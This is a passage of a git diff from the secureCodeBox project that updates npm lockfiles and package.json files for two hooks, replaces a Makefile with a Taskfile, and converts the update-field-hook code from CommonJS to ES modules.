"sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "dev": true }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", + "picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", "dev": true }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", + "react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dev": true }, "secure-json-parse": { @@ -6319,67 +1379,12 @@ "resolved": "https://registry.npmjs.org/secure-json-parse/-/secure-json-parse-3.0.2.tgz", "integrity": "sha512-H6nS2o8bWfpFEV6U38sOSjS7bTbdgbCGU9wEM6W14P5H0QOsz94KCusifV44GpHDTu2nqZbuDNhTzu+mjDSw1w==" }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, "slash": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, "stack-utils": { "version": "2.0.6", "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", @@ -6389,54 +1394,6 @@ "escape-string-regexp": "^2.0.0" } }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, "supports-color": { "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", @@ -6445,12 +1402,6 @@ "has-flag": "^4.0.0" } }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, "table-layout": { "version": "4.1.1", "resolved": "https://registry.npmjs.org/table-layout/-/table-layout-4.1.1.tgz", @@ -6460,29 +1411,6 @@ "wordwrapjs": "^5.1.0" } }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, "to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", @@ -6497,18 +1425,6 @@ "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==" }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, "typical": { "version": "7.3.0", "resolved": "https://registry.npmjs.org/typical/-/typical-7.3.0.tgz", @@ -6524,123 +1440,10 @@ "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==" }, - "update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, "wordwrapjs": { "version": "5.1.0", "resolved": "https://registry.npmjs.org/wordwrapjs/-/wordwrapjs-5.1.0.tgz", "integrity": "sha512-JNjcULU2e4KJwUNv6CHgI46UvDGitb6dGryHajXTDiLgg1/RiGoPSDw4kZfYnwGtEXf2ZMeIewDQgFGzkCB2Sg==" - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true } } } diff --git a/hooks/persistence-elastic/hook/package.json b/hooks/persistence-elastic/hook/package.json index cd03a1fba2..93a5141687 100644 --- a/hooks/persistence-elastic/hook/package.json +++ b/hooks/persistence-elastic/hook/package.json @@ -8,9 +8,7 @@ "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" }, "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, + "scripts": {}, "keywords": [ "secureCodeBox", "security", @@ -39,12 +37,10 @@ "license": "Apache-2.0", "dependencies": { "@elastic/elasticsearch": "^8.18.2", - "lodash.chunk": "^4.2.0", - "lodash.flatmap": "^4.5.0", - "luxon": "^3.6.1" + "lodash-es": "^4.17.21", + "luxon": "^3.7.1" }, "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" + "@types/jest": "^30.0.0" } } \ No newline at end of file diff --git a/hooks/update-field-hook/Makefile b/hooks/update-field-hook/Makefile deleted file mode 100644 index 998e48adce..0000000000 --- a/hooks/update-field-hook/Makefile +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = update-field-hook - -include ../../hooks.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-test-scan - -.PHONY: deploy -deploy: - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install update-category . --wait \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="attribute.name=category" \ - --set="attribute.value=fancy-category" - helm -n integration-tests upgrade --install update-severity . --wait \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="attribute.name=severity" \ - --set="attribute.value=high" \ No newline at end of file diff --git a/hooks/update-field-hook/Taskfile.yaml b/hooks/update-field-hook/Taskfile.yaml new file mode 100644 index 0000000000..5013f4d600 --- /dev/null +++ b/hooks/update-field-hook/Taskfile.yaml @@ -0,0 +1,12 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: update-field-hook diff --git a/hooks/update-field-hook/hook/Dockerfile b/hooks/update-field-hook/hook/Dockerfile index 2f59d82b14..dc64c7bf24 100644 --- a/hooks/update-field-hook/hook/Dockerfile +++ b/hooks/update-field-hook/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/hooks/update-field-hook/hook/hook.js b/hooks/update-field-hook/hook/hook.js index 98924b03e0..f1f3f28b80 100644 --- a/hooks/update-field-hook/hook/hook.js +++ b/hooks/update-field-hook/hook/hook.js @@ -2,9 +2,9 @@ // // SPDX-License-Identifier: Apache-2.0 -const set = require("lodash.set"); +import { set } from "lodash-es"; -async function handle({ +export async function handle({ getFindings, updateFindings, attributeName = process.env["ATTRIBUTE_NAME"], @@ -21,4 +21,3 @@ async function handle({ await updateFindings(newFindings); } -module.exports.handle = handle; diff --git a/hooks/update-field-hook/hook/hook.test.js b/hooks/update-field-hook/hook/hook.test.js index 99ccc10835..f701f6a6db 100644 --- a/hooks/update-field-hook/hook/hook.test.js +++ b/hooks/update-field-hook/hook/hook.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook"); +import { handle } from "./hook"; test("should send a post request to the url when fired", async () => { const findings = [ diff --git a/hooks/update-field-hook/hook/package-lock.json b/hooks/update-field-hook/hook/package-lock.json index 9ee10456bc..70eacc779d 100644 --- a/hooks/update-field-hook/hook/package-lock.json +++ b/hooks/update-field-hook/hook/package-lock.json @@ -9,5959 +9,941 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "lodash.set": "^4.3.2" + "lodash-es": "^4.17.21" }, "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" + "@types/jest": "^30.0.0" } }, - "node_modules/@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "node_modules/@babel/code-frame": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, + "license": "MIT", "dependencies": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" }, "engines": { - "node": ">=6.0.0" + "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", + "node_modules/@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, + "license": "MIT", "engines": { "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, + "license": "MIT", "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, + "license": "MIT", "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, + "license": "MIT", "dependencies": { - "color-name": "1.1.3" + "@types/node": "*", + "jest-regex-util": "30.0.1" + }, + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@jest/pattern/node_modules/jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", "dev": true, + "license": "MIT", "engines": { - "node": ">=0.8.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/has-flag": { + "node_modules/@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/istanbul-lib-report": { "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, - "engines": { - "node": ">=4" + "dependencies": { + "@types/istanbul-lib-coverage": "*" } }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, + "license": "MIT", "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" + "@types/istanbul-lib-report": "*" } }, - "node_modules/@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", + "node_modules/@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, - "engines": { - "node": ">=6.9.0" + "license": "MIT", + "dependencies": { + "expect": "^30.0.0", + "pretty-format": "^30.0.0" } }, - "node_modules/@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": 